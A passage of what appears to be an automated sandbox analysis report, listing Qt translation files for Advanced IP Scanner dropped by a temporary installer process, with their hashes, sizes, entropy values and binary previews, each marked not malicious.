                                                                                                                                                                                                  Preview:<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9..*.y.....*.y...i.*.%.....*.0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ko_kr.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22516
                                                                                                                                                                                                  Entropy (8bit):5.64342773223904
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
                                                                                                                                                                                                  MD5:C09D31E3E2A0F6B673F8B26AA49B8E9E
                                                                                                                                                                                                  SHA1:829B459D3642E84D0F0E0AE30D16203C583B1A88
                                                                                                                                                                                                  SHA-256:30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
                                                                                                                                                                                                  SHA-512:DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........E....;.......;...-...;...!...;.......;..5....O..H,...[..D....^..&5...^..Av..(5......G....|..H,..? ..K...2:..N:......V...6Q.._...I....... .......?G...y..?........_.......6......E....t.."#...t..?....t..G......2....j......5t...#..@...4s..H5..FY..f...&U......6................K...~..(....`..,....e..Gw......G........|. =...7..*.y.....*.y.....*.%...v.*.0.....+.......+.....~.+....,.+......+.....%.G.......G...."i.H0...G..Hw9.....Hw9.....I.... ..J6......J6....".J6......J6...9..LD......L.b..H..M.S..3^.R.......V....&w.Wi...G,.W.T...K.Z.|..@..[f3..C..gc....0.w0K..8...H....I......H....T...I..."..*....~..+... d..7K...T..%...2....k......F.......K..9.E..2..L.#..M..M$o...n.e.......l8...+a...^..9...I...........4.......A5......F}..>...-..>......3..%...l...;.......-..5.l..J..AV... q.y....E#...0..A.......A.......F)..tb..*................G......B.......0x......>..(....A..1V...!R.R....'..W.<..K[.f.~...@......)...1........^..*....5...=..........c..7..;6...L..q.J..>...I....o..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lt_lt.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28545
                                                                                                                                                                                                  Entropy (8bit):4.714189994601161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
                                                                                                                                                                                                  MD5:2AADC93C38DBB7E1D048B05B63133217
                                                                                                                                                                                                  SHA1:66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
                                                                                                                                                                                                  SHA-256:A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
                                                                                                                                                                                                  SHA-512:63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[*...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A*..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H..*.y.....*.y.....*.%..%V.*.0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lv_lv.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27649
                                                                                                                                                                                                  Entropy (8bit):4.760709648438812
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
                                                                                                                                                                                                  MD5:C41CF1ECCEF6EB2CB6BBAF02A383BC28
                                                                                                                                                                                                  SHA1:B2E5D8721D04232F7219AC00496379C14576E33D
                                                                                                                                                                                                  SHA-256:61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
                                                                                                                                                                                                  SHA-512:341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W....;...X...;.......;...U...;..!?...;..B....O..Z....[..V....^../....^..Rh..(5......G....$..H,..Op..K...?T..N:......V...DQ.._...\.......(.......O....y..P........o.......t......W....t..*s...t..Pv...t..Zo.....@@...j...#..5t......@...B...H5..X...f.../.......E....................~..2....`..6....e..Y.......Z........(. =...F..*.y.....*.y...A.*.%..$..*.0..$..+.......+.......+....<.+......+....&..G.... M.G....*..H0...ZC.Hw9...q.Hw9...c.I....(r.J6....".J6......J6......J6...H..LD......L.b..Z..M.S..@..R.....\.V..../..Wi...Y..W.T.....Z.|..QE.[f3..U..gc......w0K..G<..H...%.......[....T......."..4T...~..6b.. d..E{...T......2....+......X......._M.9.E..?..L.#..a..M$o.....e.......l8...5....^..H...I....b......B4......R!......X...>...=..>......3../K..l...JN......9p.5.l..^C.AV...(1.y....V....0..R.......Q.......XM..tb..4................s......SS......<.......N..(....R..1V...)L.R....1..W.<..^..f.~..".......3...1........^..5e...5..............c..E..;6...`g.q.J..N...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nb_no.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26887
                                                                                                                                                                                                  Entropy (8bit):4.711499642917058
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
                                                                                                                                                                                                  MD5:D0C083D4760D44DB80A0AEDE7862D5EC
                                                                                                                                                                                                  SHA1:155B7B067596D105B0BC4471BD654F1D9B720D20
                                                                                                                                                                                                  SHA-256:186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
                                                                                                                                                                                                  SHA-512:B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........U....;.......;...U...;...g...;.. ....;..@....O..W....[..S....^...)...^..O...(5......G.......H,..L...K...=H..N:......V...B..._...X.......'.......M....y..M................d......T....t..)5...t..M....t..W......>....j...5..5t......@...?...H5..U...f....I......B........i.......%...~..1<...`..5 ...e..W.......W+......... =...C..*.y.....*.y...3.*.%..#v.*.0..#..+.....s.+.......+......+......+....%Q.G.....A.G....)..H0...WW.Hw9...C.Hw9...s.I....'<.J6......J6......J6......J6...F/.LD......L.b..W..M.S..>..R.....".V.....o.Wi...V..W.T.....Z.|..N..[f3..R^.gc....N.w0K..D...H...$Q......Xz...T......."..2....~..4... d..C=...T..,...2...........V ......\K.9.E..=..L.#..^..M$o.....e.......l8...4i...^..Fb..I....8......@.......O.......U...>......>...f..3..-...l...G.......7..5.l..[9.AV...&..y....T%...0..PT......OM......Uy..tb..3........?.......g......P.......:.......K..(....O..1V...(..R....0;.W.<..[..f.~.. .......2...1........^..3....5..........x...c..C..;6...]m.q.J..Lh..I....O..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nl_nl.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28029
                                                                                                                                                                                                  Entropy (8bit):4.645006029092153
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:nsoeTpwn8BLKep+1uYLGPlUMpitDd0FoTGv8QAyEDPQRBHYerHcgDOIq0IDbn8:nsoeTpXr+KiBd0qTayPQRdBv
                                                                                                                                                                                                  MD5:1DCBBF653BCB4D127D902EAB60CBB42A
                                                                                                                                                                                                  SHA1:BDC0ACD9FEE35B3F1446210A45C5B20ED9987F8A
                                                                                                                                                                                                  SHA-256:F1C9FB8580866B3066DD4BA9A559F3161B4E3240831A8439F9720B12B40FA010
                                                                                                                                                                                                  SHA-512:9A85094294FB5884BDD548E7BEDFCB97760ABE61ED76AAC5EF2E7AF6127EBEC33D1F16FF3DB7FC59FB294C12F3E78E2547BABB4A992864B13CC3BAC7DB0C8F22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........YP...;.......;.......;.......;..!o...;..C....O..\....[..W....^..0)...^..S...(5......G....H..H,..P...K...@P..N:...J..V...EA.._...]B......) ......P....y..QM...............R......Y&...t..*....t..Q....t..[......A,...j......5t......@...C...H5..Y...f...0I......E....................~..3....`..7....e..[;......[c.......B. =...F..*.y.....*.y.....*.%..$..*.0..%..+.....5.+.......+....h.+......+....&..G.... ..G....+-.H0...[..Hw9...S.Hw9.....I....(..J6....x.J6......J6......J6...I..LD......L.b..[..M.S..A..R.......V....0s.Wi...Z..W.T.....Z.|..R..[f3..Vn.gc....Z.w0K..H...H...%.......\....T...9..."..5....~..74.. d..Fg...T......2....7......ZP......`..9.E..@..L.#..cO.M$o.....e.......l8...6....^..I...I....Z......CF......Sw......Z...>...m..>......3../...l...K@......:>.5.l.._..AV...(q.y....Xa...0..TF......S9......Y...tb..5................Q......T.......=.......O`.(....S..1V...)..R....2..W.<..`%.f.~.."4......4...1....A...^..6;...5..............c..F..;6...a..q.J..P,..I....=..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pl_pl.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28357
                                                                                                                                                                                                  Entropy (8bit):4.7436866012778625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
                                                                                                                                                                                                  MD5:45864510329D981D80C616641357FEFF
                                                                                                                                                                                                  SHA1:C4EB7D6D98D29656FA2DE8E9923750556408E865
                                                                                                                                                                                                  SHA-256:3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
                                                                                                                                                                                                  SHA-512:93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G..*.y.....*.y.....*.%..%~.*.0..%..+.....;.+.....*.+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...*(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pt_br.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28217
                                                                                                                                                                                                  Entropy (8bit):4.655652026218731
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
                                                                                                                                                                                                  MD5:C8AF2228F3F331635F1E4E55E1C9FD32
                                                                                                                                                                                                  SHA1:9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
                                                                                                                                                                                                  SHA-256:16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
                                                                                                                                                                                                  SHA-512:DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Y....;.......;.......;.......;..!....;..DV...O..\....[..X....^..0o...^..Td..(5......G....v..H,..QV..K...@...N:...h..V...E..._...^"......)N......Q....y..Q.......................Y....t..+....t..Rl...t..\k.....A....j......5t......@...C...H5..Z...f...0.......Fd...................~..3j...`..8....e..[.......\........N. =...G..*.y.....*.y...Y.*.%..%..*.0..%E.+.....;.+.......+....n.+......+....&..G.... ..G....+a.H0...\A.Hw9.....Hw9.....I....(..J6....j.J6......J6......J6...JM.LD......L.b..\..M.S..B..R.......V....0..Wi...[..W.T.....Z.|..SA.[f3..W..gc....D.w0K..H...H...%.......]....T...A..."..5r...~..7... d..F....T......2....G......Z.......as.9.E..A..L.#..d..M$o.....e.......l8...7E...^..J...I....^......C.......T.......Z...>...Y..>......3..0...l...L.......:..5.l..`..AV...(..y....X....0..T.......S.......ZW..tb..60......................US......>(......P..(....T..1V...)..R....2_.W.<..`..f.~.."T......4...1....;...^..6....5..............c..GF.;6...b..q.J..P...I....1..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ro_ro.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28132
                                                                                                                                                                                                  Entropy (8bit):4.6803756692053184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
                                                                                                                                                                                                  MD5:2DB27B87481EDE8D4FE8C92431A5C5AC
                                                                                                                                                                                                  SHA1:0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
                                                                                                                                                                                                  SHA-256:A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
                                                                                                                                                                                                  SHA-512:B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........Y....;.......;...O...;.. K...;.."%...;..D....O..\....[..Xh...^..0....^..T,..(5......G.......H,..Q...K...@...N:......V...E..._...].......).......Q[...y..Q.......................Y....t..+....t..RD...t..\+.....A....j.. ...5t......@...C...H5..ZU..f...0.......F................E...~..3....`..8d...e..[.......[........t. =...G..*.y.....*.y.....*.%..%..*.0..%..+.....{.+.....0.+......+....h.+....'u.G....!+.G....+..H0...\..Hw9.....Hw9...Q.I....)r.J6......J6....>.J6......J6...JY.LD......L.b..\X.M.S..BR.R.......V....1..Wi...[L.W.T...5.Z.|..S..[f3..V..gc....z.w0K..H...H...&.......]<...T...q..."..5....~..7... d..G....T../I..2....e......Z.......a..9.E..AL.L.#..c..M$o.....e.....B.l8...7....^..J...I....b......C.......S.......Z}..>...y..>......3..0q..l...L.......;..5.l..`..AV...)'.y....X....0..T.......S.......Z...tb..6........I..............U.......>p......O..(....TR.1V...*h.R....2..W.<..`..f.~..".......5`..1........^..7....5..............c..G^.;6...b?.q.J..P...I....s..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ru_ru.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28292
                                                                                                                                                                                                  Entropy (8bit):5.300323619618019
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
                                                                                                                                                                                                  MD5:70059C7809B9DB196A6A58588536B7D6
                                                                                                                                                                                                  SHA1:6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
                                                                                                                                                                                                  SHA-256:7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
                                                                                                                                                                                                  SHA-512:EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8|...e..\M......\s......... =...G..*.y...b.*.y...%.*.%..%X.*.0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sk_sk.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27607
                                                                                                                                                                                                  Entropy (8bit):4.7796924802259895
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
                                                                                                                                                                                                  MD5:3AB470D0817DA632BCDA59AB7C24C08B
                                                                                                                                                                                                  SHA1:C2A643FF68C75A0573ED6A506427F3233848453C
                                                                                                                                                                                                  SHA-256:8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
                                                                                                                                                                                                  SHA-512:A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O*..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t..*....t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E..*.y...p.*.y.....*.%..$B.*.0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sl_si.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28344
                                                                                                                                                                                                  Entropy (8bit):4.687451491727224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
                                                                                                                                                                                                  MD5:950906410E936E0BB5F109082105D7B6
                                                                                                                                                                                                  SHA1:C2B7B811141FDAC2DBC712095759E3C68CE77565
                                                                                                                                                                                                  SHA-256:F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
                                                                                                                                                                                                  SHA-512:FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G..*.y.....*.y...].*.%..%6.*.0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sr_latn_rs.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27834
                                                                                                                                                                                                  Entropy (8bit):4.7072414399522335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
                                                                                                                                                                                                  MD5:A3264DCBED0CEFC981230E4CCADF8807
                                                                                                                                                                                                  SHA1:0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
                                                                                                                                                                                                  SHA-256:6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
                                                                                                                                                                                                  SHA-512:7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P*..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..*m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7*...e..Z.......Z........6. =...Fo.*.y.....*.y...].*.%..$..*.0..$..+.....G.+.......+....x.+......+....&..G.... ..G....*..H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sv_se.qm (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27099
                                                                                                                                                                                                  Entropy (8bit):4.717079738585517
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
                                                                                                                                                                                                  MD5:58ACBFB46226E1833250D5F5A7CE7D6E
                                                                                                                                                                                                  SHA1:5711848C2E2E5D5144B5F965A0F856611773A7F4
